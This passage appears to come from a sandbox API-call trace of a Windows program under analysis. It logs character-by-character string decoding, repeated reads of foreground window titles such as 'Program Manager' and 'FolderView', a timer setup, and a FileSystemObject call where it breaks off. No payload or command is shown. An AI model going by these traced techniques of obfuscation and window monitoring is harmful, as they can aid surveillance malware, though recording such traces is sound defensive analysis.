(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.324] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.324] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.324] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.325] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.325] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.326] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.326] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.327] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.327] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.328] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.328] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.328] GetForegroundWindow () returned 0x20086 [0182.329] GetLastError () returned 0x0 [0182.329] SysStringLen (param_1=" ") returned 0xff [0182.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.329] SysStringLen (param_1=" ") returned 0xff [0182.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.329] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0182.329] GetLastError () returned 0x0 [0182.330] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.330] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0182.330] SysStringLen (param_1="Pro") returned 0x3 [0182.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x1150ca4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0182.331] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0182.331] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0182.331] GetFocus () returned 0x0 [0182.331] lstrlenA (lpString="Pro") returned 3 [0182.331] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0182.331] IsWindow (hWnd=0x103c4) returned 1 [0182.332] IsWindow (hWnd=0x103c4) returned 1 [0182.332] IsWindow (hWnd=0x103c4) returned 1 [0182.332] IsWindow (hWnd=0x103c4) returned 1 [0182.332] GetFocus () returned 0x0 [0182.333] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0182.333] GetFocus () returned 0x0 [0182.333] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0182.334] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0182.334] GetFocus () returned 0x0 [0182.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0182.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0182.334] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.334] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.335] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.336] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.336] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.336] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.337] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.337] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.338] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.338] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.339] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.339] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.340] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.340] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.340] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.341] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.341] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.342] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.342] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.342] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.343] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.343] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.344] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.344] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.345] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.345] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.345] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.346] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.346] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.347] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.347] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.348] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.348] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.349] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.350] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.350] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.350] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.351] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.351] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.352] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.352] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.353] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0182.353] GetForegroundWindow () returned 0x1011a [0182.353] GetLastError () returned 0x0 [0182.353] SysStringLen (param_1=" ") returned 0xff [0182.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.353] SysStringLen (param_1=" ") returned 0xff [0182.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.354] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0182.354] GetLastError () returned 0x0 [0182.354] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.354] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0182.354] SysStringLen (param_1="Fo") returned 0x2 [0182.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fo", cchWideChar=3, lpMultiByteStr=0x116859c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fo", lpUsedDefaultChar=0x0) returned 3 [0182.355] SetWindowTextA (hWnd=0x103c4, lpString="Fo") returned 1 [0182.355] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0182.355] GetFocus () returned 0x0 [0182.355] lstrlenA (lpString="Fo") returned 2 [0182.355] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0182.356] IsWindow (hWnd=0x103c4) returned 1 [0182.356] IsWindow (hWnd=0x103c4) returned 1 [0182.356] IsWindow (hWnd=0x103c4) returned 1 [0182.356] IsWindow (hWnd=0x103c4) returned 1 [0182.357] GetFocus () returned 0x0 [0182.357] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0182.357] GetFocus () returned 0x0 [0182.357] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0182.357] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0182.358] GetFocus () returned 0x0 [0182.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0182.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fo", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=3 | out: lpWideCharStr="Fo") returned 3 [0182.358] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.358] VarBstrCmp (bstrLeft="Fo", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.358] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0182.359] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0182.359] GetTickCount () returned 0x1d1a4f5 [0182.359] IsWindowVisible (hWnd=0x103b8) returned 0 [0182.359] Sleep (dwMilliseconds=0x0) [0182.399] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22cdc, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 